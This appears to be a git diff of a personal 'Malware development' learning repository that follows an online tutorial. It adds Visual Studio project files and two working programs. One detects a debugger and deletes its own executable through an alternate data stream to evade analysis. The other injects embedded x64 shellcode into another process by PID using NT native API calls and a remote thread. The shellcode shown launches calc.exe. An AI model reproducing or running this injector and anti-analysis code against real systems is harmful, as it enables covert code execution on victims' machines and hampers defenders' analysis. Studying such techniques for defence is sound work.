WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + + + + + + \ No newline at end of file diff --git a/6-self-deleting-file/6-self-deleting-file.vcxproj.filters b/6-self-deleting-file/6-self-deleting-file.vcxproj.filters new file mode 100644 index 0000000..fc82b90 --- /dev/null +++ b/6-self-deleting-file/6-self-deleting-file.vcxproj.filters @@ -0,0 +1,30 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + Source Files + + + + + Source Files + + + \ No newline at end of file diff --git a/6-self-deleting-file/debugger.asm b/6-self-deleting-file/debugger.asm new file mode 100644 index 0000000..9b9d188 --- /dev/null +++ b/6-self-deleting-file/debugger.asm @@ -0,0 +1,15 @@ +.code + +GetPEB proc + mov rax, qword ptr gs:[60h] + ret +GetPEB endp + +BeingDebugged proc + xor eax, eax + call GetPEB + movzx eax, byte ptr [rax+2h] + ret +BeingDebugged endp + +end \ No newline at end of file diff --git a/6-self-deleting-file/error.asm b/6-self-deleting-file/error.asm new file mode 100644 index 0000000..08d1be1 --- /dev/null +++ b/6-self-deleting-file/error.asm @@ -0,0 +1,15 @@ +.code + +GetTEB proc + mov rax, qword ptr gs:[30h] + ret +GetTEB endp + +CustomError proc + xor eax, eax + call GetTEB + mov eax, dword ptr [rax+68h] + ret +CustomError endp + +end \ No newline at end of file diff --git a/6-self-deleting-file/main.cpp b/6-self-deleting-file/main.cpp new file mode 100644 index 0000000..dd89d17 --- /dev/null +++ b/6-self-deleting-file/main.cpp @@ -0,0 +1,84 @@ +#include +#include +#include +#include +#include + +#define log(msg, ...) printf(msg "\n", ##__VA_ARGS__) + +#define NEW_STREAM L":CROW" + +extern "C" { + extern DWORD CustomError(void); + extern DWORD BeingDebugged(void); +} + +BOOL CheckDebugger() { + return BeingDebugged() != 0; +} + +int SelfDelete() { + WCHAR ProgramPath[MAX_PATH * 2] = { 0 }; + if (GetModuleFileNameW(NULL, ProgramPath, MAX_PATH * 2) == 0 ) { + log("Error GetModuleFileNameW: %ld", CustomError()); + return -1; + } + + { // Rename file, to move data to an alternate data stream + DWORD rename_size = sizeof(FILE_RENAME_INFO) + sizeof(NEW_STREAM); + PFILE_RENAME_INFO PFRI = (PFILE_RENAME_INFO)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, rename_size); + if (PFRI == NULL) { + log("Failed HeapAlloc: %ld", CustomError()); + return -1; + } + + PFRI->ReplaceIfExists = FALSE; + PFRI->RootDirectory = NULL; + PFRI->FileNameLength = sizeof(NEW_STREAM) - 2; + memcpy(PFRI->FileName, NEW_STREAM, sizeof(NEW_STREAM) - 2); + + HANDLE file = CreateFileW(ProgramPath, (DELETE | SYNCHRONIZE), FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL); + if (file == INVALID_HANDLE_VALUE) { + log("Failed 1 CreateFileW: %ld", CustomError()); + return -1; + } + + if (!SetFileInformationByHandle(file, FileRenameInfo, PFRI, rename_size)) { + log("Failed SetFileInformationByHandle: %ld", CustomError()); + } + + CloseHandle(file); + HeapFree(GetProcessHeap(), 0, PFRI); + } + + { // Delete the alternate data stream + HANDLE file = CreateFileW(ProgramPath, (DELETE | SYNCHRONIZE), FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL); + if (file == INVALID_HANDLE_VALUE) { + log("Failed 2 CreateFileW: %ld", CustomError()); + return -1; + } + + FILE_DISPOSITION_INFO set_delete = { 0 }; + set_delete.DeleteFile = TRUE; + if (!SetFileInformationByHandle(file, FileDispositionInfo, &set_delete, sizeof(FILE_DISPOSITION_INFO))) { + log("Failed SetFileInformationByHandle: %ld", CustomError()); + } + + CloseHandle(file); + } + + log("Deleted self"); + + return 0; +} + +int main() { + + if (!CheckDebugger()) { + MessageBoxW(NULL, L"KEK", L"KEK", MB_ICONEXCLAMATION); + } else { + SelfDelete(); + } + + return 0; +} \ No newline at end of file diff --git a/7-native-api/.gitignore b/7-native-api/.gitignore new file mode 100644 index 0000000..8dd4607 --- /dev/null +++ b/7-native-api/.gitignore @@ -0,0 +1,398 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. +## +## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Mono auto generated files +mono_crash.* + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +[Ww][Ii][Nn]32/ +[Aa][Rr][Mm]/ +[Aa][Rr][Mm]64/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ +[Ll]ogs/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUnit +*.VisualState.xml +TestResult.xml +nunit-*.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# ASP.NET Scaffolding +ScaffoldingReadMe.txt + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.tlog +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Coverlet is a free, cross platform Code Coverage Tool +coverage*.json +coverage*.xml +coverage*.info + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# NuGet Symbol Packages +*.snupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx +*.appxbundle +*.appxupload + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!?*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser +*- [Bb]ackup.rdl +*- [Bb]ackup ([0-9]).rdl +*- [Bb]ackup ([0-9][0-9]).rdl + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio 6 auto-generated project file (contains which files were open etc.) +*.vbp + +# Visual Studio 6 workspace and project file (working project files containing files to include in project) +*.dsw +*.dsp + +# Visual Studio 6 technical files +*.ncb +*.aps + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# Visual Studio History (VSHistory) files +.vshistory/ + +# BeatPulse healthcheck temp database +healthchecksdb + +# Backup folder for Package Reference Convert tool in Visual Studio 2017 +MigrationBackup/ + +# Ionide (cross platform F# VS Code tools) working folder +.ionide/ + +# Fody - auto-generated XML schema +FodyWeavers.xsd + +# VS Code files for those working on multiple tools +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +*.code-workspace + +# Local History for Visual Studio Code +.history/ + +# Windows Installer files from build outputs +*.cab +*.msi +*.msix +*.msm +*.msp + +# JetBrains Rider +*.sln.iml \ No newline at end of file diff --git a/7-native-api/7-native-api.sln b/7-native-api/7-native-api.sln new file mode 100644 index 0000000..990a243 --- /dev/null +++ b/7-native-api/7-native-api.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.7.34221.43 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "7-native-api", "7-native-api.vcxproj", "{2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Debug|x64.ActiveCfg = Debug|x64 + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Debug|x64.Build.0 = Debug|x64 + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Debug|x86.ActiveCfg = Debug|Win32 + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Debug|x86.Build.0 = Debug|Win32 + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Release|x64.ActiveCfg = Release|x64 + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Release|x64.Build.0 = Release|x64 + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Release|x86.ActiveCfg = Release|Win32 + {2014DFC2-CB9A-4CCD-9A8B-41F4B53F0C4E}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {76A9D3F7-F9D9-479F-9793-DEEB8B08BEE9} + EndGlobalSection +EndGlobal diff --git a/7-native-api/7-native-api.vcxproj b/7-native-api/7-native-api.vcxproj new file mode 100644 index 0000000..78064ec --- /dev/null +++ b/7-native-api/7-native-api.vcxproj @@ -0,0 +1,138 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 17.0 + Win32Proj + {2014dfc2-cb9a-4ccd-9a8b-41f4b53f0c4e} + My7nativeapi + 10.0 + + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + + + + + + + + + + + + + + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + + + + \ No newline at end of file diff --git a/7-native-api/7-native-api.vcxproj.filters b/7-native-api/7-native-api.vcxproj.filters new file mode 100644 index 0000000..7dec86f --- /dev/null +++ b/7-native-api/7-native-api.vcxproj.filters @@ -0,0 +1,27 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + + + Header Files + + + \ No newline at end of file diff --git a/7-native-api/NTStub.h b/7-native-api/NTStub.h new file mode 100644 index 0000000..a7ff6ce --- /dev/null +++ b/7-native-api/NTStub.h @@ -0,0 +1,95 @@ +#pragma once +#pragma comment (lib, "ntdll") + +#include + +#define STATUS_SUCCESS (NTSTATUS)0 + +typedef struct _UNICODE_STRING +{ + USHORT Length; + USHORT MaximumLength; + _Field_size_bytes_part_(MaximumLength, Length) PWCH Buffer; +} UNICODE_STRING, * PUNICODE_STRING; + +typedef struct _OBJECT_ATTRIBUTES +{ + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; // PSECURITY_DESCRIPTOR; + PVOID SecurityQualityOfService; // PSECURITY_QUALITY_OF_SERVICE +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +typedef struct _PS_ATTRIBUTE +{ + ULONG_PTR Attribute; + SIZE_T Size; + union + { + ULONG_PTR Value; + PVOID ValuePtr; + }; + PSIZE_T ReturnLength; +} PS_ATTRIBUTE, * PPS_ATTRIBUTE; + +typedef struct _PS_ATTRIBUTE_LIST +{ + SIZE_T TotalLength; + PS_ATTRIBUTE Attributes[1]; +} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; + +typedef struct _CLIENT_ID +{ + HANDLE UniqueProcess; + HANDLE UniqueThread; +} CLIENT_ID, * PCLIENT_ID; + +typedef NTSTATUS (NTAPI* NtCreateThreadEx) ( + _Out_ PHANDLE ThreadHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ HANDLE ProcessHandle, + _In_ PVOID StartRoutine, // PUSER_THREAD_START_ROUTINE + _In_opt_ PVOID Argument, + _In_ ULONG CreateFlags, // THREAD_CREATE_FLAGS_* + _In_ SIZE_T ZeroBits, + _In_ SIZE_T StackSize, + _In_ SIZE_T MaximumStackSize, + _In_opt_ PPS_ATTRIBUTE_LIST AttributeList +); + +typedef NTSTATUS (NTAPI* NtClose) ( + _In_ _Post_ptr_invalid_ HANDLE Handle +); + +typedef NTSTATUS(NTAPI* NtOpenProcess) ( + _Out_ PHANDLE ProcessHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PCLIENT_ID ClientId +); + +typedef NTSTATUS (NTAPI* NtAllocateVirtualMemory) ( + _In_ HANDLE ProcessHandle, + _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID* BaseAddress, + _In_ ULONG_PTR ZeroBits, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG AllocationType, + _In_ ULONG Protect +); + +typedef NTSTATUS (NTAPI* NtWriteVirtualMemory) ( + _In_ HANDLE ProcessHandle, + _In_opt_ PVOID BaseAddress, + _In_reads_bytes_(BufferSize) PVOID Buffer, + _In_ SIZE_T BufferSize, + _Out_opt_ PSIZE_T NumberOfBytesWritten +); + +typedef NTSTATUS (NTAPI* NtWaitForSingleObject) ( + _In_ HANDLE Handle, + _In_ BOOLEAN Alertable, + _In_opt_ PLARGE_INTEGER Timeout +); \ No newline at end of file diff --git a/7-native-api/main.cpp b/7-native-api/main.cpp new file mode 100644 index 0000000..0b4c684 --- /dev/null +++ b/7-native-api/main.cpp @@ -0,0 +1,162 @@ +#include +#include +#include "NTStub.h" +#include + +#define log(msg, ...) printf(msg "\n", ##__VA_ARGS__) +#define log_info(msg, ...) log("[i] " msg, ##__VA_ARGS__) +#define log_err(msg, ...) log("[-] " msg, ##__VA_ARGS__) +#define log_ok(msg, ...) log("[+] " msg, ##__VA_ARGS__) + +unsigned char g_shellcode[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" +"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" +"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" +"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" +"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" +"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" +"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" +"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" +"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" +"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" +"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" +"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" +"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" +"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" +"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" +"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd" +"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" +"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" +"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; + +int main(int argc, char **argv) { + if (argc < 2) { + log_err("Usage: %s ", argv[0]); + return -1; + } + + DWORD pid = atoi(argv[1]); + log_info("Opening process with pid %ld", pid); + + HANDLE process = NULL; + HANDLE thread = NULL; + LPVOID buffer = NULL; + + NtOpenProcess nt_open_process = NULL; + NtClose nt_close = NULL; + NtCreateThreadEx nt_create_thread_ex = NULL; + NtAllocateVirtualMemory nt_allocate_virtual_memory = NULL; + NtWriteVirtualMemory nt_write_virtual_memory = NULL; + NtWaitForSingleObject nt_wait_for_single_object = NULL; + + // Grab NT API functions + { + HMODULE ntdll_module = GetModuleHandleA("Ntdll"); + if (ntdll_module == NULL) { + log_err("Failed get Ntdll.dll: %ld", GetLastError()); + goto cleanup; + } + + nt_open_process = (NtOpenProcess)GetProcAddress(ntdll_module, "NtOpenProcess"); + if (nt_open_process == NULL) { + log_err("Failed get NtOpenProcess: %ld", GetLastError()); + goto cleanup; + } + + nt_close = (NtClose)GetProcAddress(ntdll_module, "NtClose"); + if (nt_close == NULL) { + log_err("Failed get NtClose: %ld", GetLastError()); + goto cleanup; + } + + nt_create_thread_ex = (NtCreateThreadEx)GetProcAddress(ntdll_module, "NtCreateThreadEx"); + if (nt_create_thread_ex == NULL) { + log_err("Failed get NtCreateThreadEx: %ld", GetLastError()); + goto cleanup; + } + + nt_allocate_virtual_memory = (NtAllocateVirtualMemory)GetProcAddress(ntdll_module, "NtAllocateVirtualMemory"); + if (nt_allocate_virtual_memory == NULL) { + log_err("Failed get NtAllocateVirtualMemory: %ld", GetLastError()); + goto cleanup; + } + + nt_write_virtual_memory = (NtWriteVirtualMemory)GetProcAddress(ntdll_module, "NtWriteVirtualMemory"); + if (nt_write_virtual_memory == NULL) { + log_err("Failed get NtWriteVirtualMemory: %ld", GetLastError()); + goto cleanup; + } + + nt_wait_for_single_object = (NtWaitForSingleObject)GetProcAddress(ntdll_module, "NtWaitForSingleObject"); + if (nt_wait_for_single_object == NULL) { + log_err("Failed get NtWaitForSingleObject: %ld", GetLastError()); + goto cleanup; + } + } + + // OpenProcess() + { + OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL }; + CLIENT_ID CID = { (HANDLE)pid, NULL }; + + NTSTATUS status = nt_open_process(&process, PROCESS_ALL_ACCESS, &OA, &CID); + if (status != STATUS_SUCCESS) { + log_err("Failed to open process: 0x%lx", status); + goto cleanup; + } + assert(process != NULL); + } + log_ok("Successfully opened process handle"); + + // VirtualAllocEx + { + size_t region_size = sizeof(g_shellcode); + NTSTATUS status = nt_allocate_virtual_memory(process, &buffer, 0, ®ion_size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (status != STATUS_SUCCESS) { + log_err("Failed to allocate %lld bytes in process: 0x%lx", region_size, status); + goto cleanup; + } + } + log_ok("Allocated %lld bytes in process", sizeof(g_shellcode)); + + // WriteProcessMemory + { + NTSTATUS status = nt_write_virtual_memory(process, buffer, g_shellcode, sizeof(g_shellcode), NULL); + if (status != STATUS_SUCCESS) { + log_err("Failed to write bytes: 0x%lx", status); + goto cleanup; + } + } + log_ok("Wrote shellcode to allocated buffer"); + + // CreateRemoteThreadEx + { + OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL }; + PS_ATTRIBUTE_LIST AL = { 0 }; + + NTSTATUS status = nt_create_thread_ex(&thread, THREAD_ALL_ACCESS, &OA, process, buffer, NULL, FALSE, NULL, NULL, NULL, NULL); + if (status != STATUS_SUCCESS) { + log_err("Failed create remote thread: 0x%lx", status); + goto cleanup; + } + assert(process != NULL); + } + log_ok("Successfully created thread with shellcode"); + + log_info("Waiting for thread to finish..."); + nt_wait_for_single_object(thread, FALSE, NULL); + log_info("Thread finished"); + +cleanup: + if (thread != NULL) { + log_info("Closing thread handle"); + nt_close(thread); + } + if (process != NULL) { + log_info("Closing process handle"); + nt_close(process); + } + + return 0; +} \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..4083a80 --- /dev/null +++ b/README.md @@ -0,0 +1,3 @@ +# Malware development + +Following tutorial from: https://www.crow.rip/crows-nest/mal/dev \ No newline at end of file